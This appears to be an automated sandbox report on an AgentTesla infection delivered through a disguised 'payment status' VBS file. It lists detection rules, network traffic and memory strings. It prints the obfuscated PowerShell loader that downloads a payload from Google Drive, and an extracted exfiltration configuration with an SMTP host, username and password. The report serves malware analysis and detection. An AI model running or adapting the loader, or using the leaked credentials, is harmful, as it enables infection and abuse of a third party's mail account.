And,brLrerfvPic l:Fornj1 Su.d3 Jugo1Super.semis0Zoacu)Ejerk byggeGA veleSprgecByghekKami,oPolyp/Betrd2Relig0 Marg1Pusle0 N,vl0 Mac 1Remme0Kompl1,tats Sner FSelvfi TvinrHamameJordbfConfooOplaexRa pa/Fgte 1Thune3Detal1Har w.Repro0.atbr ';$Laulau=Efterbevilget 'EfteruDihalsSphageUdklkrgrat,-PolypATrkniGbes,yEAhnfen uldktForep ';$dyrlgeforeningens=Efterbevilget 'Ud,ejh EjertRoejot Jakopwheyfs inka: Phil/Subsk/ ubardBylderTotrii PhervBabcoe Kiss..elvogInhaboF reloGolligmel el stumeAffek.Civ lcTour oVolumm C.li/ VineuLsn ncP epr?Snigme.ruthxAllmspSprayo WitcrUngratBo ga=Bio hd ubtoRan awsilicn D sil ,iseo IdeeaNonevdOdont& NonwiSolandK ist=Katte1UnsavMKomteZV.scuMEnd mL Fami1CyathuCotesicocklZAcetao Lign-Co prvPant.hnonlu3NilaszYusarm B,osz AntecVejovpStderfCo ciWHymenCenkelYOut,sh Onses HardkarbejVJottiK Form3Stere9Sc ewGFon mLProfuyMdt,a ';$Tetrapolar126=Efterbevilget 'Wilbu>Reinf ';$Sope=Efterbevilget ' SekuICensueUnd.rx knhj ';$Mollycot46='Leucochroic';$Enteromegalia='\Mejeriernes.Pra';Rationaliseringsgevinsten (Efterbevilget 'Ekspo$UnsadgInfraLPeridoT ttob UndiaUnderLDy,el:greenppluteLBro eADarticRenteekevilHkryddoGisprLballodAlko Eintrar .osmsUlt a= A.pe$F atweBldagNfabriv Unse:RingrAKompepMeltwPOpposDExa,cAImpovtEnredaPalme+U.til$Squ mE ChaiNNou etdeklae b.gsr I,dsoTra.iMLuxemEbr,acgStatiaLjpesL GalaiGrebeafun n ');Rationaliseringsgevinsten (Efterbevilget 'Ind a$ NondGNattolKirkeOBrys.BH mmeaDet clS.bno: Sa,bAVajeeFu wormB milAEditoTCe ilTAn itENonpodKo,taeFla e=Afk.s$GratiDDel,uY PigmR OverLPreapGunpreEMa.keFSolbrO Ste runi,eePenumnPletsISamhrnNott,g Yp,ieS butNP lyrSMiss..melerSDasylpNedfrlHyperI soilT,ibli(Flykk$UncantMagi ECkwyat Agg.R owayAPlyndpModstOV eskLUninnAAa emRUpbre1 skrk2Fir k6Brefr) ntyi ');Rationaliseringsgevinsten (Efterbevilget 'Angel[KokkenFigurE AkkutTekst.Midtls SmieE oldsRWee dvStereIKristCSrintECancepAritmoStrukI D.miNScullTSansem esknaStemmnTzaamASidebGRodfsEUdranrLe de]Milit:De us:Z,cchS archETr inCSelm UO munr ylofID tastFreewYUnd,sPUnredRUrinro SubjtYrke,OHunknCSportO i
              Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
              Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\OUTSTANDING PAYMENT STATUS 01199241024.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\OUTSTANDING PAYMENT STATUS 01199241024.vbs", CommandLine|base64offset|contains: <, Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\OUTSTANDING PAYMENT STATUS 01199241024.vbs", ProcessId: 5996, ProcessName: wscript.exe
              Sigma detected: Non Interactive PowerShell Process Spawned
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Sildefdningerne Retable tyranniserer Kevutzoth Slagterbutik Udefineret Billigelserne #>;$Prokuraens='Slgten';<#Joblessness Sejsingers Elementarladningen Disownable Winterfeeding #>;$Cheekbonesncavate=$Saltometer+$host.UI; function Efterbevilget($Semihydrate){If ($Cheekbonesncavate) {$phillipe++;}$Teetotalism=$hunder+$Semihydrate.'Length'-$phillipe; for( $Cheekbones=5;$Cheekbones -lt $Teetotalism;$Cheekbones+=6){$Bevillige=$Cheekbones;$Kirtimukha+=$Semihydrate[$Cheekbones];$Zirian='Delegant';}$Kirtimukha;}function Rationaliseringsgevinsten($Herkan){ & ($Sope) ($Herkan);}$Provokatr=Efterbevilget 'pro yMfyrreoNonadz Fodbi,lasulT gnel WronaAngam/Ov.rn ';$Provokatr+=Efterbevilget ' Sl f5Makes.Cloth0Chi p Emoti( TranWS aciiHutchnGipsdd,onfio bl.gwKrimssshake MathiNSlartTOmadr u vin1M rty0 Over.Cou.t0Re,us; ira sapidWkommei I.fonDoc,s6Selsk4 Mart;Phleg AbortxFyrre6Facon4Dist ;Large And,brLrerfvPic l:Fornj1 Su.d3 Jugo1Super.semis0Zoacu)Ejerk byggeGA veleSprgecByghekKami,oPolyp/Betrd2Relig0 Marg1Pusle0 N,vl0 Mac 1Remme0Kompl1,tats Sner FSelvfi TvinrHamameJordbfConfooOplaexRa pa/Fgte 1Thune3Detal1Har w.Repro0.atbr ';$Laulau=Efterbevilget 'EfteruDihalsSphageUdklkrgrat,-PolypATrkniGbes,yEAhnfen uldktForep ';$dyrlgeforeningens=Efterbevilget 'Ud,ejh EjertRoejot Jakopwheyfs inka: Phil/Subsk/ ubardBylderTotrii PhervBabcoe Kiss..elvogInhaboF reloGolligmel el stumeAffek.Civ lcTour oVolumm C.li/ VineuLsn ncP epr?Snigme.ruthxAllmspSprayo WitcrUngratBo ga=Bio hd ubtoRan awsilicn D sil ,iseo IdeeaNonevdOdont& NonwiSolandK ist=Katte1UnsavMKomteZV.scuMEnd mL Fami1CyathuCotesicocklZAcetao Lign-Co prvPant.hnonlu3NilaszYusarm B,osz AntecVejovpStderfCo ciWHymenCenkelYOut,sh Onses HardkarbejVJottiK Form3Stere9Sc ewGFon mLProfuyMdt,a ';$Tetrapolar126=Efterbevilget 'Wilbu>Reinf ';$Sope=Efterbevilget ' SekuICensueUnd.rx knhj ';$Mollycot46='Leucochroic';$Enteromegalia='\Mejeriernes.Pra';Rationaliseringsgevinsten (Efterbevilget 'Ekspo$UnsadgInfraLPeridoT ttob UndiaUnderLDy,el:greenppluteLBro eADarticRenteekevilHkryddoGisprLballodAlko Eintrar .osmsUlt a= A.pe$F atweBldagNfabriv Unse:RingrAKompepMeltwPOpposDExa,cAImpovtEnredaPalme+U.til$Squ mE ChaiNNou etdeklae b.gsr I,dsoTra.iMLuxemEbr,acgStatiaLjpesL GalaiGrebeafun n ');Rationaliseringsgevinsten (Efterbevilget 'Ind a$ NondGNattolKirkeOBrys.BH mmeaDet clS.bno: Sa,bAVajeeFu wormB milAEditoTCe ilTAn itENonpodKo,taeFla e=Afk.s$GratiDDel,uY PigmR OverLPreapGunpreEMa.keFSolbrO Ste runi,eePenumnPletsISamhrnNott,g Yp,ieS butNP lyrSMiss..melerSDasylpNedfrlHyperI soilT,ibli(Flykk$UncantMagi ECkwyat Agg.R owayAPlyndpModstOV eskLUninnAAa emRUpbre1 skrk2Fir k6Brefr) ntyi ');Rationaliseringsgevinsten (Efterbevilget 'Angel[KokkenFigurE AkkutTekst.Midtls SmieE oldsRWee dvStereIKristCSrintECancepAritmoStrukI D.miNScullTSansem esknaStemmnTzaamASidebGRodfsEUdranrLe de]Milit:De us:Z,cchS archETr inCSelm UO munr ylofID tastFreewYUnd,sPUnredRUrinro SubjtYrke,OHunknCSportO i

              Suricata Signatures

              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-24T08:46:58.617838+020028032702Potentially Bad Traffic192.168.2.549875142.250.185.238443TCP

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Found malware configuration
              Source: conhost.exe.5720.3.memstrminMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.ihcm.com.my", "Username": "kienyee@ihcm.com.my", "Password": "Kienyee53625362"}
              Multi AV Scanner detection for submitted file
              Source: OUTSTANDING PAYMENT STATUS 01199241024.vbsReversingLabs: Detection: 21%
              AI detected suspicious sample
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 98.8% probability
              Source: unknownHTTPS traffic detected: 142.250.185.238:443 -> 192.168.2.5:49704 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 142.250.185.238:443 -> 192.168.2.5:49705 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 142.250.186.65:443 -> 192.168.2.5:49706 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 142.250.185.238:443 -> 192.168.2.5:49875 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 142.250.186.65:443 -> 192.168.2.5:49881 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.5:49902 version: TLS 1.2
              Source: Binary string: ystem.pdb source: powershell.exe, 00000002.00000002.2259897499.0000011F98EFF000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbF`u source: powershell.exe, 00000002.00000002.2307123172.0000011FB1570000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: m.Core.pdbpdb source: powershell.exe, 00000002.00000002.2259897499.0000011F98EFF000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: dbpdbtem.pdb source: powershell.exe, 00000002.00000002.2259897499.0000011F98EFF000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: nagement.Automation.pdb source: powershell.exe, 00000005.00000002.2458725438.00000000008F2000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: ore.pdbysd source: powershell.exe, 00000005.00000002.2485903748.000000000714A000.00000004.00000020.00020000.00000000.sdmp

              Software Vulnerabilities

              barindex
              Suspicious execution chain found
              Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              Source: global trafficTCP traffic: 192.168.2.5:49935 -> 202.71.109.165:587
              Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1MZML1uiZo-vh3zmzcpfWCYhskVK39GLy HTTP/1.1Host: drive.google.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /download?id=1MZML1uiZo-vh3zmzcpfWCYhskVK39GLy&export=download HTTP/1.1Host: drive.usercontent.google.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
              Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
              Source: Joe Sandbox ViewIP Address: 104.26.12.205 104.26.12.205
              Source: Joe Sandbox ViewIP Address: 104.26.12.205 104.26.12.205
              Source: Joe Sandbox ViewASN Name: TUT-ASUS TUT-ASUS
              Source: Joe Sandbox ViewASN Name: TMVADS-APTM-VADSDCHostingMY TMVADS-APTM-VADSDCHostingMY
              Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
              Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
              Source: unknownDNS query: name: api.ipify.org
              Source: unknownDNS query: name: api.ipify.org
              Source: unknownDNS query: name: ip-api.com
              Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.5:49875 -> 142.250.185.238:443
              Source: global trafficTCP traffic: 192.168.2.5:49935 -> 202.71.109.165:587
              Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1MZML1uiZo-vh3zmzcpfWCYhskVK39GLy HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1m3Bn2eQH6bYOUTR9vsZueEzLbkmQowfA HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /download?id=1m3Bn2eQH6bYOUTR9vsZueEzLbkmQowfA&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1MZML1uiZo-vh3zmzcpfWCYhskVK39GLy HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1MZML1uiZo-vh3zmzcpfWCYhskVK39GLy HTTP/1.1Host: drive.google.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /download?id=1MZML1uiZo-vh3zmzcpfWCYhskVK39GLy&export=download HTTP/1.1Host: drive.usercontent.google.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1m3Bn2eQH6bYOUTR9vsZueEzLbkmQowfA HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /download?id=1m3Bn2eQH6bYOUTR9vsZueEzLbkmQowfA&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
              Source: global trafficDNS traffic detected: DNS query: drive.google.com
              Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
              Source: global trafficDNS traffic detected: DNS query: api.ipify.org
              Source: global trafficDNS traffic detected: DNS query: ip-api.com
              Source: global trafficDNS traffic detected: DNS query: mail.ihcm.com.my
              Source: msiexec.exe, 00000007.00000002.3357530310.0000000024868000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
              Source: msiexec.exe, 00000007.00000002.3357530310.0000000024868000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicServerAuthenticationRootE46.crl0
              Source: msiexec.exe, 00000007.00000002.3357530310.0000000024868000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicServerAuthenticationRootE46.p7c0#
              Source: msiexec.exe, 00000007.00000002.3357530310.0000000024868000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/cPanelECCDomainValidationSecureServerCA3.crt0#
              Source: powershell.exe, 00000002.00000002.2260354457.0000011F9B14E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2260354457.0000011F9ADB3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://drive.google.com
              Source: powershell.exe, 00000002.00000002.2260354457.0000011F9B21F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2260354457.0000011F9ADEC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://drive.usercontent.google.com
              Source: msiexec.exe, 00000007.00000002.3357530310.0000000024831000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com
              Source: msiexec.exe, 00000007.00000002.3357530310.0000000024831000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/line/?fields=hosting
              Source: msiexec.exe, 00000007.00000002.3357530310.0000000024868000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mail.ihcm.com.my
              Source: powershell.exe, 00000002.00000002.2301285247.0000011FA909E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
              Source: msiexec.exe, 00000007.00000002.3357530310.0000000024868000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
              Source: msiexec.exe, 00000007.00000002.3357530310.0000000024868000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.com0
              Source: powershell.exe, 00000002.00000002.2260354457.0000011F99258000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
              Source: powershell.exe, 00000002.00000002.2260354457.0000011F99031000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2461640765.0000000004631000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.3357530310.00000000247E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: powershell.exe, 00000002.00000002.2260354457.0000011F99258000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
              Source: powershell.exe, 00000002.00000002.2260354457.0000011F99031000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
              Source: powershell.exe, 00000005.00000002.2461640765.0000000004631000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lBjq
              Source: msiexec.exe, 00000007.00000002.3357530310.00000000247E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org
              Source: msiexec.exe, 00000007.00000002.3357530310.00000000247E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/
              Source: msiexec.exe, 00000007.00000002.3357530310.00000000247E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/t
              Source: powershell.exe, 00000002.00000002.2260354457.0000011F994CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2260354457.0000011F9ADB3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2260354457.0000011F9ADD8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2260354457.0000011F994CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2260354457.0000011F994B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2260354457.0000011F9ADD4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
              Source: powershell.exe, 00000002.00000002.2301285247.0000011FA909E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
              Source: powershell.exe, 00000002.00000002.2301285247.0000011FA909E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
              Source: powershell.exe, 00000002.00000002.2301285247.0000011FA909E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
              Source: powershell.exe, 00000002.00000002.2260354457.0000011F9B14E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2260354457.0000011F9ADAE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.googP
              Source: powershell.exe, 00000002.00000002.2260354457.0000011F9B14E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2260354457.0000011F99258000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2260354457.0000011F9A994000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2260354457.0000011F994DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com
              Source: powershell.exe, 00000002.00000002.2260354457.0000011F99258000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1MZML1uiZo-vh3zmzcpfWCYhskVK39GLyP
              Source: powershell.exe, 00000005.00000002.2461640765.0000000004788000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1MZML1uiZo-vh3zmzcpfWCYhskVK39GLyXR
              Source: powershell.exe, 00000002.00000002.2260354457.0000011F9ADD8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.googh(Lo
              Source: powershell.exe, 00000002.00000002.2260354457.0000011F9ADD8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2260354457.0000011F9B21F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com
              Source: powershell.exe, 00000002.00000002.2260354457.0000011F994CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2260354457.0000011F9ADB3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2260354457.0000011F9ADD8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2260354457.0000011F9B21F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2260354457.0000011F994CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2260354457.0000011F995E3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2260354457.0000011F994B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2260354457.0000011F9ADD4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1MZML1uiZo-vh3zmzcpfWCYhskVK39GLy&export=download
              Source: powershell.exe, 00000002.00000002.2260354457.0000011F994CE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com3Sou
              Source: powershell.exe, 00000002.00000002.2260354457.0000011F99258000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
              Source: powershell.exe, 00000002.00000002.2260354457.0000011F99F94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
              Source: powershell.exe, 00000002.00000002.2301285247.0000011FA909E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
              Source: powershell.exe, 00000002.00000002.2260354457.0000011F994CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2260354457.0000011F9ADB3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2260354457.0000011F9ADD8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2260354457.0000011F994CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2260354457.0000011F994B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2260354457.0000011F9ADD4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
              Source: powershell.exe, 00000002.00000002.2260354457.0000011F994CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2260354457.0000011F9ADB3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2260354457.0000011F9ADD8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2260354457.0000011F994CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2260354457.0000011F994B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2260354457.0000011F9ADD4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
              Source: powershell.exe, 00000002.00000002.2260354457.0000011F994CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2260354457.0000011F9ADB3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2260354457.0000011F9ADD8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2260354457.0000011F994CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2260354457.0000011F994B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2260354457.0000011F9ADD4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
              Source: powershell.exe, 00000002.00000002.2260354457.0000011F994CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2260354457.0000011F9ADB3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2260354457.0000011F9ADD8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2260354457.0000011F994CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2260354457.0000011F994B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2260354457.0000011F9ADD4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
              Source: powershell.exe, 00000002.00000002.2260354457.0000011F994CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2260354457.0000011F9ADB3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2260354457.0000011F9ADD8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2260354457.0000011F994CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2260354457.0000011F994B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2260354457.0000011F9ADD4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49875
              Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49881
              Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49875 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
              Source: unknownNetwork traffic detected: HTTP traffic on port 49881 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49902
              Source: unknownNetwork traffic detected: HTTP traffic on port 49902 -> 443
              Source: unknownHTTPS traffic detected: 142.250.185.238:443 -> 192.168.2.5:49704 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 142.250.185.238:443 -> 192.168.2.5:49705 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 142.250.186.65:443 -> 192.168.2.5:49706 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 142.250.185.238:443 -> 192.168.2.5:49875 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 142.250.186.65:443 -> 192.168.2.5:49881 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.5:49902 version: TLS 1.2

              System Summary

              barindex
              Malicious sample detected (through community Yara rule)
              Source: amsi64_6800.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: amsi32_4508.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: Process Memory Space: powershell.exe PID: 6800, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: Process Memory Space: powershell.exe PID: 4508, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Windows Scripting host queries suspicious COM object (likely to drop second stage)
              Source: C:\Windows\System32\wscript.exeCOM Object queried: WBEM Locator HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}Jump to behavior
              Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Management and Instrumentation HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}Jump to behavior
              Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
              Wscript starts Powershell (via cmd or directly)
